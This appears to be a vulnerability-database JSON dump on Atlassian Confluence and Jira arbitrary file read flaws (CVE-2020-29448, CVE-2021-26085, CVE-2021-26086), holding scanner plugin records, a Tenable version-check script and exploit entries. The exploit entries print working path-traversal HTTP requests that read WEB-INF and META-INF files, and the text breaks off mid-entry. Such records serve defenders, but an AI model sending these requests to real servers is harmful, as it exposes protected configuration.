"https://www.tenable.com/plugins/was/112860", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T12:05:49", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x < 7.4.6 or 7.5.x < 7.8.3. It is, therefore, affected by an incorrect path access check vulnerability allowing unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-05T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.6 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112861", "href": "https://www.tenable.com/plugins/was/112861", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-12T16:50:25", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x prior to 7.4.6 or 7.5.x prior to 7.8.3. It is, therefore, affected by an arbitrary file read vulnerability in its ConfluenceResourceDownloadRewriteRule class due to an incorrect path access check. An unauthenticated, remote attacker can exploit this to read arbitrary files within WEB-INF and META-INF.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-02-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.18 / 6.14 < 7.4.6 / 7.5 < 7.8.3 Arbitrary File Read (CONFSERVER-60469)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-60469.NASL", "href": "https://www.tenable.com/plugins/nessus/146869", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146869);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2020-29448\");\n script_xref(name:\"IAVA\", value:\"2021-A-0105-S\");\n\n script_name(english:\"Atlassian Confluence < 6.13.18 / 6.14 < 7.4.6 / 7.5 < 7.8.3 Arbitrary File Read (CONFSERVER-60469)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.18, 6.14.x prior to 7.4.6 or 7.5.x prior to 7.8.3. It is, therefore, affected by an arbitrary file\nread vulnerability in its ConfluenceResourceDownloadRewriteRule class due to an incorrect path access check. An \nunauthenticated, remote attacker can exploit this to read arbitrary files within WEB-INF and META-INF.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-60469\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.18, 7.4.6, 7.8.3, 7.9.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29448\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nconstraints = [\n {'fixed_version' : '6.13.18' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.6' },\n {'min_version' : '7.5', 'fixed_version' : '7.8.3', 'fixed_display' : '7.8.3 / 7.9.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T12:06:00", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.18, 6.14.x < 7.4.6 or 7.5.x < 7.8.3. It is, therefore, affected by an incorrect path access check vulnerability allowing unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-07-05T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.8.3 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-29448"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112862", "href": "https://www.tenable.com/plugins/was/112862", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:17", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 8.5.14, 8.6.x < 8.13.6 or 8.14.x < 8.16.1. It is, therefore, affected by a path traversal vulnerability in the /WEB-INF/web.xml endpoint allowing remote attackers to read particular files.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Jira < 8.5.14 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112954", "href": "https://www.tenable.com/plugins/was/112954", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:12", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 8.5.14, 8.6.x < 8.13.6 or 8.14.x < 8.16.1. It is, therefore, affected by a path traversal vulnerability in the /WEB-INF/web.xml endpoint allowing remote attackers to read particular files.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.14.x < 8.16.1 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112956", "href": "https://www.tenable.com/plugins/was/112956", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:07", "description": "According to its self-reported version number, the instance of Atlassian Jira hosted on the remote web server is prior to 8.5.14, 8.6.x < 8.13.6 or 8.14.x < 8.16.1. It is, therefore, affected by a path traversal vulnerability in the /WEB-INF/web.xml endpoint allowing remote attackers to read particular files.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Jira 8.6.x < 8.13.6 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112955", "href": "https://www.tenable.com/plugins/was/112955", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-21T19:39:56", "description": "An arbitrary file read vulnerability exists in the /s/ endpoint of Atlassian Confluence Server. An unauthenticated, remote attacker can abuse this vulnerability to view restricted resources", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-10-20T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Arbitrary File Read (CVE-2021-26085)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2022-06-21T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2021-26085.NBIN", "href": "https://www.tenable.com/plugins/nessus/154244", "sourceData": "Binary data confluence_cve-2021-26085.nbin", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:15", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 7.4.10 or 7.5.x prior to 7.12.3. It is, therefore, affected by a pre-authorization arbitrary file read vulnerability in the /s/ endpoint.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.5.x < 7.12.3 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112966", "href": "https://www.tenable.com/plugins/was/112966", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-12T11:58:10", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 7.4.10 or 7.5.x prior to 7.12.3. It is, therefore, affected by a pre-authorization arbitrary file read vulnerability in the /s/ endpoint.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 7.4.10 Arbitrary File Read", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112965", "href": "https://www.tenable.com/plugins/was/112965", "sourceData": "No source data", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "githubexploit": [{"lastseen": "2022-03-30T20:29:27", "description": "# CVE-2021-26086\nAtlassian Jira Server/Data Center 8.4.0 - Limit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T14:09:52", "type": "githubexploit", "title": "Exploit for Path Traversal in Atlassian Jira Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086"], "modified": "2022-03-24T06:27:56", "id": "9413B7EF-463D-5026-9383-8878A2BD51D2", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:36", "description": "## CVE-2021-26085\nIdeas from: https://github.com/ColdFusionX/CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-06T20:03:22", "type": "githubexploit", "title": "Exploit for Missing Authorization in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-06T20:11:41", "id": "B3FA9C79-AA38-5ADB-8E71-898783D49FB4", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-25T07:17:16", "description": "# CVE-2021-26085\nAtlassian Confluence Server 7.5.1 Pre-Authoriza...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T08:20:25", "type": "githubexploit", "title": "Exploit for Missing Authorization in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2022-02-25T06:52:29", "id": "7568F9C3-3A35-590E-90A2-866D5C8D59B2", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-04T15:49:50", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2021-10-05T00:00:00", "type": "zdt", "title": "Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-05T00:00:00", "id": "1337DAY-ID-36852", "href": "https://0day.today/exploit/description/36852", "sourceData": "# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read\n# Exploit Author: Mayank Deshmukh\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/jira/download/data-center\n# Version: versions < 8.5.14, 8.6.0 \u2264 version < 8.13.6, 8.14.0 \u2264 version < 8.16.1\n# Tested on: Kali Linux & Windows 10\n# CVE : CVE-2021-26086\n\nPOC File #1 - web.xml\n\nGET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\nPOC File #2 - seraph-config.xml\n\nGET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #3 - decorators.xml\n\nGET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n\nPOC File #4 - /jira-webapp-dist/pom.properties\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #5 - /jira-webapp-dist/pom.xml\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #6 - /atlassian-jira-webapp/pom.xml\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC File #7 - /atlassian-jira-webapp/pom.properties\n\nGET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1\nHost: 127.0.0.1:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n", "sourceHref": "https://0day.today/exploit/36852", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-11T23:53:34", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-10-05T00:00:00", "type": "zdt", "title": "Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26085"], "modified": "2021-10-05T00:00:00", "id": "1337DAY-ID-36851", "href": "https://0day.today/exploit/description/36851", "sourceData": "# Exploit Title: Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read\n# Exploit Author: Mayank Deshmukh\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: version < 7.4.10 and 7.5.0 \u2264 version < 7.12.3\n# Tested on: Kali Linux & Windows 10\n# CVE : CVE-2021-26085\n\nPOC #1 - web.xml\n\nGET /s/123cfx/_/;/WEB-INF/web.xml HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC #2 - seraph-config.xml\n\nGET /s/123cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC #3 - pom.properties\n\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPOC #4 - pom.xml\n\nGET /s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml HTTP/1.1\nHost: 127.0.0.1:8090\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n", "sourceHref": "https://0day.today/exploit/36851", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2021-08-20T07:29:10", "description": "", "cvss3": {}, "published": "2021-08-20T00:00:00", "type": "seebug", "title": "Atlassian Jira \u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff08CVE-2021-26086\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-08-20T00:00:00", "id": "SSV:99336", "href": "https://www.seebug.org/vuldb/ssvid-99336", "sourceData": "", "sourceHref": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-10-05T15:04:08", "description": "", "cvss3": {}, "published": "2021-10-05T00:00:00", "type": "packetstorm", "title": "Atlassian Jira Server/Data Center 8.4.0 File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26086"], "modified": "2021-10-05T00:00:00", "id": "PACKETSTORM:164405", "href": "https://packetstormsecurity.com/files/164405/Atlassian-Jira-Server-Data-Center-8.4.0-File-Read.html", "sourceData": "`# Exploit Title: Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include \n# Date: 2021-10-05 \n# Exploit Author: Mayank Deshmukh \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/jira/download/data-center \n# Version: versions < 8.5.14, 8.6.0 \u2264 version < 8.13.6, 8.14.0 \u2264 version < 8.16.1 \n# Tested on: Kali Linux & Windows 10 \n# CVE : CVE-2021-26086 \n \nPOC File #1 - web.xml \n \nGET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1 \nHost: 127.0.0.1:8080 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 